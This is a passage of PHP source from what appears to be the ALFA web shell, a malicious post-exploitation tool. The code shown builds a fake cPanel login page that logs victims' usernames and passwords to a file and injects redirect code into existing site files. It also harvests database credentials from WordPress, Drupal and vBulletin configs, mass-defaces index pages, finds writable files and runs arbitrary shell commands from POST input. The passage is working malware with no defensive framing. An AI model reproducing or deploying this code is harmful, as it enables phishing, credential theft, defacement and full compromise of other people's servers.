6672 $cpanel_log = '<?php $cook_time = time()+(86400 * 7); $user = $_POST["'.$post_user.'"];$pass = $_POST["'.$post_pass.'"];if(!empty($user) && !empty($pass)){if(!isset($_COOKIE["'.$cookie_name.'"])){@setcookie("'.$cookie_name.'", 0, $cook_time, "/");$_COOKIE["'.$cookie_name.'"]=1;}if((int)$_COOKIE["'.$cookie_name.'"]>'.$count.'){@header("Location: /");exit;}@setcookie("'.$cookie_name.'", ((int)$_COOKIE["'.$cookie_name.'"] + 1), $cook_time, "/");$fp = @fopen("'.$logto.'", "a+");@fwrite($fp, $user . " : " . $pass . "\n");fclose($fp);sleep(3);'.$resp_code.'exit;}?>';
6673
6674 @file_put_contents($fake_root.'/log.php', $cpanel_log);
6675
6676 if($panel == "cpanel"){
6677 $fake = preg_replace(array('#<link(.*)href="(.*)"(.*)>#', '#<img class="main-logo" src="(.*)"(.*)>#', '# <a(.*)id="reset_password">#'), array('<link href="'.$target.'/$2">', '<img class="main-logo" src="'.$target.'/$1" alt="logo" />', '<a href="#" id="reset_password">'), $fake);
6678 }
6679
6680 @file_put_contents($fake_root.'/index.php', $fake);
6681
6682 $inject_code = '<?php if(isset($_GET[":2083"])&&(int)$_COOKIE["'.$cookie_name.'"]<'.$count.'){@include("'.$fake_root.'/index.php");exit;}?>';
6683 $bind_on_code = '<?php if((int)$_COOKIE["'.$cookie_name.'"]<'.$count.'){@header("Location: '.$uri.'");exit;}?>';
6684
6685 @file_put_contents($inject_to, $inject_code . "\n" .@file_get_contents($inject_to));
6686 @file_put_contents($bind_on, $bind_on_code . "\n" .@file_get_contents($bind_on));
6687
6688 echo "success...!";
6689 }else{
6690 echo "failed...!";
6691 }
6692 }else{
6693 echo("<div style='text-align:center;color:red;'>Cannot open the target...!</div>");
6694 }
6695 }
6696 echo '</div>';
6697 alfafooter();
6698}
6699function alfaarchive_manager(){
6700 alfahead();
6701 $file = $_POST['alfa2'];
6702 if(!file_exists($file)){
6703 $file = $GLOBALS['cwd'];
6704 }
6705 $rand_id = rand(9999, 999999);
6706 echo '<div class=header><center><p><div class="txtfont_header">| Archive Manager |</div></p>';
6707 echo '<form name="srch" onSubmit="g(\'archive_manager\',null,null,this.file.value,null,null,\'>>\');return false;" method=\'post\'>
6708 <div class="txtfont">
6709 Archive file: <input size="50" id="target" type="text" name="file" value="'.$file.'">
6710 <input type="submit" name="btn" value=" "></div></form></center><br>';
6711 if($_POST['alfa5']=='>>'){
6712 //echo __pre();
6713 echo '<hr><div style="margin-left: 12px;" archive_full="phar://'.$file.'" archive_name="'.basename($file).'" id="archive_dir_'.$rand_id.'" class="archive_dir_holder"><span>PWD: </span><div class="archive_pwd_holder" style="display:inline-block"><a>/</a></div></div>';
6714 echo '<div style="padding: 10px;" id="archive_base_'.$rand_id.'">';
6715 __alfa_open_archive_file($file, $rand_id);
6716 echo '</div>';
6717 }
6718 echo '</div>';
6719 alfafooter();
6720}
6721function __alfa_open_archive_file($arch, $base_id=0){
6722 try{
6723 $files = array();
6724 $dirs = array();
6725 $archive = new PharData($arch);
6726 foreach($archive as $file) {
6727 $file_modify = @date('Y-m-d H:i:s', @filemtime($file->getPathname()));
6728 if($file->isDir()) {
6729 $dirs[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "dir", "modify" => $file_modify);
6730 }else{
6731 $file_size = @filesize($file->getPathname());
6732 $files[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "file", "modify" => $file_modify, "size" => $file_size);
6733 }
6734 }
6735 function __alfa_open_archive_usort($a, $b){
6736 return strcmp(strtolower($a['name']), strtolower($b['name']))*1;
6737 }
6738 usort($dirs, "__alfa_open_archive_usort");
6739 usort($files, "__alfa_open_archive_usort");
6740 $files = array_merge($dirs, $files);
6741 echo '<table width="100%" class="main" cellspacing="0" cellpadding="2"><tbody><tr><th>Name</th><th>Size</th><th>Modify</th><th>Actions</th></tr>';
6742 $icon = '<img class="archive-icons" src="'.findicon('..','dir').'" width="30" height="30">';
6743 echo '<tr><th><a base_id="'.$base_id.'" class="archive-file-row" fname=".." onclick="alfaOpenArchive(this);" path="'.dirname($arch.'.php').'">'.$icon.'<span class="archive-name archive-type-dir">| .. |</span></a><td>dir</td><td>-</td><td>-</td></tr>';
6744 foreach($files as $file){
6745 $icon = '<img class="archive-icons" src="'.findicon($file['name'],$file['type']).'" width="30" height="30">';
6746 if($file["type"] == "dir"){
6747 echo '<tr><th><a base_id="'.$base_id.'" class="archive-file-row" onclick="alfaOpenArchive(this);" path="'.$file["path"].'" fname="'.$file["name"].'">'.$icon.'<span class="archive-name archive-type-dir">| '.$file["name"].' |</span></a><td>dir</td><td>'.$file["modify"].'</td><td>-</td></tr>';
6748 }else{
6749 echo "<tr><th><a base_id='".$base_id."' class='archive-file-row' onclick=\"editor('".$file["path"]."','auto','','','','file');\">".$icon."<span class='archive-name archive-type-file' fname='".$file["name"]."'>".$file["name"]."</span></a><td>".alfaSize($file["size"])."</td><td>".$file["modify"]."</td><td>-</td></tr>";
6750
6751 }
6752 }
6753 echo '</table>';
6754 }catch(Exception $e){
6755 echo("0");
6756 }
6757}
6758function alfaopen_archive_dir(){
6759 $dir = $_POST["alfa1"];
6760 $base_id = $_POST["alfa2"];
6761 __alfa_open_archive_file($dir, $base_id);
6762}
6763function alfaconfig_grabber(){
6764 alfahead();
6765 echo '<div class=header><center><p><div class="txtfont_header">| Config Grabber |</div></p>';
6766 echo '<form name="srch" onSubmit="g(\'config_grabber\',null,null,this.dir.value,this.ext.value,null,\'>>\');return false;" method=\'post\'>
6767 <div class="txtfont">
6768 Dir: <input size="50" id="target" type="text" name="dir" value="'.$GLOBALS['cwd'].'">
6769 Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
6770 <input type="submit" name="btn" value=" "></div></form></center><br>';
6771 $dir = $_POST['alfa2'];
6772 $ext = $_POST['alfa3'];
6773 if($_POST['alfa5']=='>>'){
6774 echo __pre();
6775 Alfa_ConfigGrabber($dir, $ext);
6776 }
6777 echo '</div>';
6778 alfafooter();
6779}
6780function Alfa_ConfigGrabber($dir, $ext) {
6781 $pattern = "#define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,}|define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,}|config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")password(?:'|\")\]|(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")|(?:'|\")(mysql|database)(?:'|\")[ ]{0,}=>[ ]{0,}array|db_name|db_user|db_pass|db_server|db_host|dbhost|dbname|dbuser|dbpass|database_name|database_user|database_pass|mysql_user|mysql_pass|mysqli_connect|mysql_connect|new[ ]{0,}mysqli#i";
6782 $db_files = array("wp-config.php","configure.php","config.inc.php","configuration.php","config.php","conf.php","dbclass.php","class_core.php","dist-configure.php", "settings.php", "conf_global.php", "db.php", "connect.php", "confing.db.php", "config.db.php", "database.php");
6783 if(@is_readable($dir)){
6784 $globFiles = @glob("$dir/*.$ext");
6785 $globDirs = @glob("$dir/*", GLOB_ONLYDIR);
6786 $blacklist = array();
6787 foreach ($globDirs as $dir) {
6788 if(!@is_readable($dir)||@is_link($dir)) continue;
6789 @Alfa_ConfigGrabber($dir, $ext);
6790 }
6791 foreach ($globFiles as $file){
6792 $filee = @file_get_contents($file);
6793 if(preg_match($pattern, $filee)){
6794 echo "<div><span>$file</span> <a style='cursor:pointer;' onclick=\"editor('".$file."','auto','','','','file');\">[ View file ]</a></div>";
6795 }
6796 }
6797 }
6798}
6799function alfasearcher(){
6800alfahead();
6801echo '<div class=header><center><p><div class="txtfont_header">| Searcher |</div></p><h3><a href=javascript:void(0) onclick="g(\'searcher\',null,\'file\')">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick="g(\'searcher\',null,\'str\')">| Find Files By Name | </a></h3></center>';
6802if(isset($_POST['alfa1'])&&$_POST['alfa1']=='file'){
6803echo '<center><div class="txtfont_header">| Find Readable Or Writable Files |</div><br><br><form name="srch" onSubmit="g(\'searcher\',null,\'file\',this.filename.value,this.ext.value,this.method.value,\'>>\');return false;" method=\'post\'>
6804<div class="txtfont">
6805Method: <select style="width: 18%;" onclick="alfa_searcher_tool(this.value);" name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>
6806Dir: <input size="50" id="target" type="text" name="filename" value="'.$GLOBALS['cwd'].'">
6807Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
6808<input type="submit" name="btn" value=" "></div></form></center><br>';
6809$dir = $_POST['alfa2'];
6810$ext = $_POST['alfa3'];
6811$method = $_POST['alfa4'];
6812if($_POST['alfa5']=='>>'){
6813echo __pre();
6814if(substr($dir,-1)=='/')$dir=substr($dir,0,-1);
6815Alfa_Searcher($dir,trim($ext),$method);
6816}
6817}
6818if($_POST['alfa1']=='str'){
6819echo '<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g(\'searcher\',null,\'str\',this.dir.value,this.string.value,\'>>\',this.ext.value,this.method.value);return false;" method=\'post\'>
6820<div class="txtfont">
6821Method: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>
6822String: <input type="text" name="string" value="">
6823Dir: <input size="50" type="text" name="dir" value="'.$GLOBALS['cwd'].'">
6824Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
6825<input type="submit" name="btn" value=" "></div></form></center><br>';
6826$dir = $_POST['alfa2'];
6827$string = $_POST['alfa3'];
6828$ext = $_POST['alfa5'];
6829if(!empty($string) AND !empty($dir) AND $_POST['alfa4'] == '>>'){
6830echo __pre();
6831Alfa_StrSearcher($dir,$string,$ext,$_POST['alfa6']);
6832}
6833}
6834echo '</div>';
6835alfafooter();
6836}
6837function alfaMassDefacer(){
6838alfahead();
6839AlfaNum(5,6,7,8,9,10);
6840echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit=\"g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');return false;\" method='post'>";
6841echo '<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>
6842 Mass dir: <input size="50" id="target" type="text" name="massdir" value="'.htmlspecialchars($GLOBALS['cwd']).'">
6843 DefPage: <input size="50" type="text" name="defpage" value="'.htmlspecialchars($GLOBALS['cwd']).'"></div> <input type="submit" name="btn" value=" "></center></p>
6844</form>';
6845$dir = $_POST['alfa1'];
6846$defpage = $_POST['alfa2'];
6847$method = $_POST['alfa3'];
6848$fCurrent = $GLOBALS['__file_path'];
6849if($_POST['alfa4'] == '>>'){
6850if(!empty($dir)){
6851if(@is_dir($dir)){
6852if(@is_readable($dir)){
6853if(@is_file($defpage)){
6854if($dh = @opendir($dir)){
6855echo __pre();
6856while (($file = @readdir($dh)) !== false){
6857if($file == '..' || $file == '.')continue;
6858$newfile=$dir.$file;
6859if($fCurrent == $newfile)continue;
6860if(@is_dir($newfile)){
6861Alfa_ReadDir($newfile,$method,$defpage);
6862}else{
6863if(!@is_writable($newfile))continue;
6864if(!@is_readable($newfile))continue;
6865Alfa_Rewriter($newfile,$file,$defpage,$method);
6866}
6867}
6868closedir($dh);
6869}else{__alert('<font color="red">Error In OpenDir...</font>');}
6870}else{__alert('<font color="red">DefPage File NotFound...</font>');}
6871}else{__alert('<font color="red">Directory is not Readable...</font>');}
6872}else{__alert('<font color="red">Mass Dir is Invalid Dir...</font>');}
6873}else{__alert('<font color="red">Dir is Empty...</font>');}
6874}
6875echo '</div>';
6876alfafooter();
6877}
6878function Alfa_ReadDir($dir,$method='',$defpage=''){
6879if(!@is_readable($dir)) return false;
6880if (@is_dir($dir)) {
6881if ($dh = @opendir($dir)) {
6882while(($file=readdir($dh))!==false) {
6883if($file == '..' || $file == '.')continue;
6884$newfile=$dir.'/'.$file;
6885if(@is_readable($newfile)&&@is_dir($newfile))Alfa_ReadDir($newfile,$method,$defpage);
6886if(@is_file($newfile)){
6887if(!@is_readable($newfile))continue;
6888Alfa_Rewriter($newfile,$file,$defpage,$method);
6889}
6890}
6891closedir($dh);
6892}
6893}
6894}
6895function Alfa_Rewriter($dir,$file,$defpage,$m='index'){
6896if(!@is_writable($dir)) return false;
6897if(!@is_readable($dir)) return false;
6898$defpage=@file_get_contents($defpage);
6899if($m == 'index'){
6900$indexs = array('index.php','index.htm','index.html','default.asp','default.aspx','index.asp','index.aspx','index.js');
6901if(in_array(strtolower($file),$indexs)){
6902@file_put_contents($dir,$defpage);
6903echo @is_file($dir)?$dir."<b><font color='red'>DeFaced...</b></font><br>" : '';
6904}
6905}elseif($m=='all'){
6906@file_put_contents($dir,$defpage);
6907echo @is_file($dir)?$dir." <b><font color='red'>DeFaced...</b></font><br>" : '';
6908}
6909}
6910function alfaGetDisFunc(){
6911alfahead();
6912echo '<div class="header">';
6913$disfun = @ini_get('disable_functions');
6914$s = explode(',',$disfun);
6915$f = array_unique($s);
6916echo '<center><br><b><font color="#7CFC00">Disable Functions</font></b><pre><table border="1"><tr><td align="center" style="background-color: green;color: white;width:5%">#</td><td align="center" style="background-color: green;color: white;">Func Name</td></tr>';
6917$i=1;
6918foreach($f as $s){
6919$s=trim($s);
6920if(function_exists($s)||!is_callable($s))continue;
6921echo '<tr><td align="center" style="background-color: black;">'.$i.'</td>';
6922echo '<td align="center" style="background-color: black;"><a style="text-decoration: none;" target="_blank" href="http://php.net/manual/en/function.'.str_replace('_','-',$s).'.php"><span class="disable_functions"><b>'.$s.'</b></span></a></td>';
6923$i++;
6924}
6925echo '</table></center>';
6926echo '</div>';
6927alfafooter();
6928}
6929function Alfa_Create_A_Tag($action,$vals){
6930$nulls = array();
6931foreach($vals as $key => $val){
6932echo '<a href=javascript:void(0) onclick="g(\''.$action.'\',';
6933for($i=1;$i<=$val[1]-1;$i++)$nulls[] = 'null';
6934$f = implode(',',$nulls);
6935echo $f.',\''.$val[0].'\');return false;">| '.$key.' | </a>';
6936unset($nulls);
6937}
6938}
6939function Alfa_Searcher($dir, $ext, $method) {
6940if(@is_readable($dir)){
6941if($method == 'all')$ext = '*';
6942if($method == 'dirs')$ext = '*';
6943$globFiles = @glob("$dir/*.$ext");
6944$globDirs = @glob("$dir/*", GLOB_ONLYDIR);
6945$blacklist = array();
6946foreach ($globDirs as $dir) {
6947if(!@is_readable($dir)||@is_link($dir)) continue;
6948@Alfa_Searcher($dir, $ext, $method);
6949}
6950switch($method){
6951case "files":
6952foreach ($globFiles as $file){
6953if(@is_writable($file)){
6954echo "$file<br>";
6955}
6956}
6957break;
6958case "dirs":
6959foreach ($globFiles as $file){
6960if(@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)){
6961echo dirname($file).'<br>';
6962$blacklist[] = dirname($file);
6963}
6964}
6965break;
6966case "all":
6967foreach ($globFiles as $file){
6968echo $file.'<br>';
6969}
6970break;
6971}
6972unset($blacklist);
6973}
6974}
6975function AlfaiFrameCreator($f,$width='100%',$height='600px'){
6976return('<iframe src="'.$f.'" width="'.$width.'" height="'.$height.'" frameborder="0"></iframe>');
6977}
6978class AlfaCURL {
6979public $headers;
6980public $user_agent;
6981public $compression;
6982public $cookie_file;
6983public $proxy;
6984public $path;
6985public $ssl = true;
6986public $curl_status = true;
6987function __construct($cookies=false,$compression='gzip',$proxy=''){
6988if(!extension_loaded('curl')){$curl_status = false;return false;}
6989$this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg';
6990$this->headers[] = 'Connection: Keep-Alive';
6991$this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';
6992$this->user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36)';
6993$this->path = ALFA_TEMPDIR.'/Alfa_cookies.txt';
6994$this->compression=$compression;
6995$this->proxy=$proxy;
6996$this->cookies=$cookies;
6997if($this->cookies)$this->cookie($this->path);
6998}
6999function cookie($cookie_file) {
7000if (_alfa_file_exists($cookie_file,false)) {
7001$this->cookie_file=$cookie_file;
7002}else{
7003@fopen($cookie_file,'w') or die($this->error('The cookie file could not be opened.'));
7004$this->cookie_file=$cookie_file;
7005@fclose($this->cookie_file);
7006}
7007}
7008function Send($url,$method="get",$data=""){
7009if(!$this->curl_status){return false;}
7010$process = curl_init($url);
7011curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
7012curl_setopt($process, CURLOPT_HEADER, 0);
7013curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
7014curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
7015curl_setopt($process, CURLOPT_ENCODING , $this->compression);
7016curl_setopt($process, CURLOPT_TIMEOUT, 30);
7017if($this->ssl){
7018curl_setopt($process, CURLOPT_SSL_VERIFYPEER ,false);
7019curl_setopt($process, CURLOPT_SSL_VERIFYHOST,false);
7020}
7021if($this->cookies){
7022curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
7023curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
7024}
7025if($this->proxy){
7026curl_setopt($process, CURLOPT_PROXY, $this->proxy);
7027}
7028if($method=='post'){
7029curl_setopt($process, CURLOPT_POSTFIELDS, $data);
7030curl_setopt($process, CURLOPT_POST, 1);
7031curl_setopt($process, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
7032}
7033$return = @curl_exec($process);
7034curl_close($process);
7035return $return;
7036}
7037function error($error) {
7038echo "<center><div style='width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px'><b>cURL Error</b><br>$error</div></center>";
7039die;
7040}
7041}
7042function getConfigHtml($cms){
7043$content = '';
7044$cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke","phpbb"=>"PHPBB","mybb"=>"MyBB","drupal"=>"Drupal","smf"=>"SMF");
7045$content .= "<form class='getconfig' onSubmit='g(\"GetConfig\",null,this.cms.value,this.path.value,this.getAttribute(\"base_id\"));return false;'><div class='txtfont'>Cms: </div> <select name='cms'style='width:100px;'>";
7046foreach($cms_array as $key => $val){
7047$content .= "<option value='{$key}' ".($key==$cms?'selected=selected':'').">{$val}</option>";
7048}
7049$content .= "</select> <div class='txtfont'>Path(installed cms/Config): </div> <input type='text' name='path' value='".$_SERVER['DOCUMENT_ROOT']."/' size='30' /> <button class='button'>GetConfig</button>";
7050$content .= "</form>";
7051return $content;
7052}
7053if (!function_exists('json_encode')){
7054 function json_encode($a=false){
7055 if (is_null($a)) return 'null';
7056 if ($a === false) return 'false';
7057 if ($a === true) return 'true';
7058 if (is_scalar($a))
7059 {
7060 if (is_float($a))
7061 {
7062 return floatval(str_replace(",", ".", strval($a)));
7063 }
7064
7065 if (is_string($a))
7066 {
7067 static $jsonReplaces = array(array("\\", "/", "\n", "\t", "\r", "\b", "\f", '"'), array('\\\\', '\\/', '\\n', '\\t', '\\r', '\\b', '\\f', '\"'));
7068 return '"' . str_replace($jsonReplaces[0], $jsonReplaces[1], $a) . '"';
7069 }
7070 else
7071 return $a;
7072 }
7073 $isList = true;
7074 for ($i = 0, reset($a); $i < count($a); $i++, next($a))
7075 {
7076 if (key($a) !== $i)
7077 {
7078 $isList = false;
7079 break;
7080 }
7081 }
7082 $result = array();
7083 if ($isList)
7084 {
7085 foreach ($a as $v) $result[] = json_encode($v);
7086 return '[' . join(',', $result) . ']';
7087 }
7088 else
7089 {
7090 foreach ($a as $k => $v) $result[] = json_encode($k).':'.json_encode($v);
7091 return '{' . join(',', $result) . '}';
7092 }
7093 }
7094}
7095if ( !function_exists('json_decode') ){
7096function json_decode($json, $array=true){
7097 $comment = false;
7098 $out = '$x=';
7099 for ($i=0; $i<strlen($json); $i++)
7100 {
7101 if (!$comment)
7102 {
7103 if ($json[$i] == '{' || $json[$i] == '['){$out .= ' array(';}
7104 else if ($json[$i] == '}' || $json[$i] == ']'){$out .= ')';}
7105 else if ($json[$i] == ':'){$out .= '=>';}
7106 else {$out .= $json[$i];}
7107 }
7108 else $out .= $json[$i];
7109 if ($json[$i] == '"') $comment = !$comment;
7110 }
7111 eval($out . ';');
7112 return $x;
7113}
7114}
7115function alfaterminalExec(){
7116 $pwd = "pwd";
7117 $seperator = ";";
7118 if($GLOBALS['sys']!='unix'){
7119 $pwd = "cd";
7120 $seperator = "&";
7121 }
7122 if($GLOBALS["glob_chdir_false"]&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."'".$seperator;}
7123 $current_path = '';
7124 if(preg_match("/cd[ ]{0,}(.*)[ ]{0,}".$seperator."|cd[ ]{0,}(.*)[ ]{0,}/i", $_POST['alfa1'], $match)){
7125 if(empty($match[1])){
7126 $match[1] = $match[2];
7127 }
7128 $current_path = alfaEx("cd ".addslashes($match[1]).$seperator.$pwd);
7129 $current_path = str_replace("\\", "/", $current_path);
7130 }
7131 $out = alfaEx($cmd.$_POST['alfa1'], true);
7132 $out = htmlspecialchars($out);
7133 echo json_encode(array("output" => convertBash($out), "path" => $current_path));
7134}
7135function convertBash($code) {
7136 $dictionary = array(
7137 '[01;30m' => '<span style="color:black">',
7138 '[01;31m' => '<span style="color:red">',
7139 '[01;32m' => '<span style="color:green">',
7140 '[01;33m' => '<span style="color:yellow">',
7141 '[01;34m' => '<span style="color:blue">',
7142 '[01;35m' => '<span style="color:purple">',
7143 '[01;36m' => '<span style="color:cyan">',
7144 '[01;37m' => '<span style="color:white">',
7145 '[0m' => '</span>'
7146 );
7147 $htmlString = str_replace(array_keys($dictionary), $dictionary, $code);
7148 return $htmlString;
7149}
7150function alfadoActions(){
7151 $chdir_fals = false;
7152 if(!@chdir($_POST['c'])){
7153 $chdir_fals = true;
7154 $alfa_canruncmd = _alfa_can_runCommand(true,true);
7155 }
7156 if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);
7157 if(isset($_POST['alfa2']))$_POST['alfa2'] = rawurldecode($_POST['alfa2']);
7158 $action = $_POST["alfa3"];
7159 if($action == "permission"){
7160 $perms = 0;
7161 $perm = $_POST["alfa2"];
7162 for($i=strlen($perm)-1;$i>=0;--$i){
7163 $perms += (int)$perm[$i]*pow(8, (strlen($perm)-$i-1));
7164 }
7165 if(@chmod($_POST['alfa1'], $perms)){
7166 echo("done");
7167 }else{
7168 echo("no");
7169 }
7170 return;
7171 }
7172 if($action == "rename" || $action == "move"){
7173 $alfa1_decoded = $_POST['alfa1'];
7174 if($chdir_fals){
7175 $_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];
7176 }
7177 $_POST['alfa1'] = trim($_POST['alfa1']);
7178 $alfa1_escape = addslashes($_POST["alfa1"]);
7179 if($_POST["alfa3"] == "rename"){
7180 $_POST['alfa2'] = basename($_POST['alfa2']);
7181 }
7182 if(!empty($_POST['alfa2'])){
7183 $cmd_rename = false;
7184 if($chdir_fals&&$alfa_canruncmd){
7185 if(_alfa_is_writable($_POST['alfa1'])){
7186 $cmd_rename = true;
7187 $alfa1_escape = addslashes($alfa1_decoded);
7188 alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa2'])."'");
7189 }
7190 }
7191 if(!file_exists($_POST['alfa2'])){
7192 if(@rename($_POST['alfa1'], $_POST['alfa2'])||$cmd_rename){
7193 echo "done";
7194 }else{
7195 echo "no";
7196 }
7197 }else{
7198 echo "no";
7199 }
7200 }
7201 }elseif($action == "copy"){
7202 if(is_dir($_POST["alfa1"])){
7203 $dir = str_replace('//', '/', $_POST["alfa1"]);
7204 $dir = explode('/', $dir);
7205 if(empty($dir[count($dir) - 1])){
7206 $name = $dir[count($dir) - 2];
7207 }else{
7208 $name = $dir[count($dir) - 1];
7209 }
7210 }else{
7211 $name = basename($_POST["alfa1"]);
7212 }
7213 $dir = dirname($_POST["alfa1"]);
7214 if($dir == "."){
7215 $dir = $_POST["c"]."/";
7216 }
7217 if(is_file($_POST["alfa1"])){
7218 @copy($_POST["alfa1"], $_POST["alfa2"]);
7219 echo("done");
7220 }elseif(is_dir($_POST["alfa1"])){
7221 if(!is_dir($_POST["alfa2"])){
7222 mkdir($_POST["alfa2"], 0755, true);
7223 }
7224 copy_paste($dir, $name , $_POST["alfa2"] . "/");
7225 echo("done");
7226 }
7227 }elseif($action == "modify"){
7228 if( !empty($_POST['alfa1']) ) {
7229 $time = strtotime($_POST['alfa1']);
7230 if($time){
7231 $touched = false;
7232 if($chdir_fals&&$alfa_canruncmd){
7233 alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa1']))."' '".addslashes($_POST['alfa2'])."'");
7234 $touched = true;
7235 }
7236 if(!@touch($_POST['alfa2'],$time,$time)&&!$touched){
7237 echo 'no';
7238 }else{
7239 echo 'ok';
7240 }
7241 } else{
7242 echo 'badtime';
7243 }
7244 }
7245 }
7246
7247}
7248function alfaget_flags(){
7249 $flags = array();
7250 if(function_exists("curl_version")){
7251 $curl = new AlfaCURL();
7252 $server_addr = (!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]);
7253 $flag = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $server_addr);
7254 $flag2 = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $_SERVER["REMOTE_ADDR"]);
7255 if(strpos($flag2, "geoplugin") != false){
7256 $flag = json_decode($flag, true);
7257 $flag2 = json_decode($flag2, true);
7258 if(!empty($flag['geoplugin_countryCode'])){
7259 $flags["server"]["name"] = $flag['geoplugin_countryName'];
7260 $flags["server"]["code"] = $flag['geoplugin_countryCode'];
7261 }
7262 if(!empty($flag2['geoplugin_countryCode'])){
7263 $flags["client"]["name"] = $flag2['geoplugin_countryName'];
7264 $flags["client"]["code"] = $flag2['geoplugin_countryCode'];
7265 }
7266 }
7267 }
7268 echo json_encode($flags);
7269}
7270function alfaGetConfig(){
7271$cms = $_POST['alfa1'];
7272$path = trim($_POST['alfa2']);
7273$config = array(
7274'wp'=>array('file'=>'/wp-config.php',
7275'host'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
7276'dbname'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_NAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
7277'dbuser'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_USER(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
7278'dbpw'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PASSWORD(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
7279'prefix'=>array("/table_prefix[ ]{0,}=[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,};/",1)
7280),
7281'drupal'=>array('file'=>'/config.php',
7282'host'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
7283'dbname'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_DATABASE(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
7284'dbuser'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_USERNAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
7285'dbpw'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PASSWORD(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1),
7286'prefix'=>array("/define[ ]{0,}\([ ]{0,}(?:'|\")DB_PREFIX(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\)[ ]{0,};/",1)
7287),
7288'drupal2'=>array('file'=>'/sites/default/settings.php',
7289'host'=>array("/(?:'|\")host(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
7290'dbname'=>array("/(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
7291'dbuser'=>array("/(?:'|\")username(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
7292'dbpw'=>array("/(?:'|\")password(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1),
7293'prefix'=>array("/(?:'|\")prefix(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/",1)
7294),
7295'vb'=>array('file'=>'/includes/config.php',
7296'host'=>array("/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")servername(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
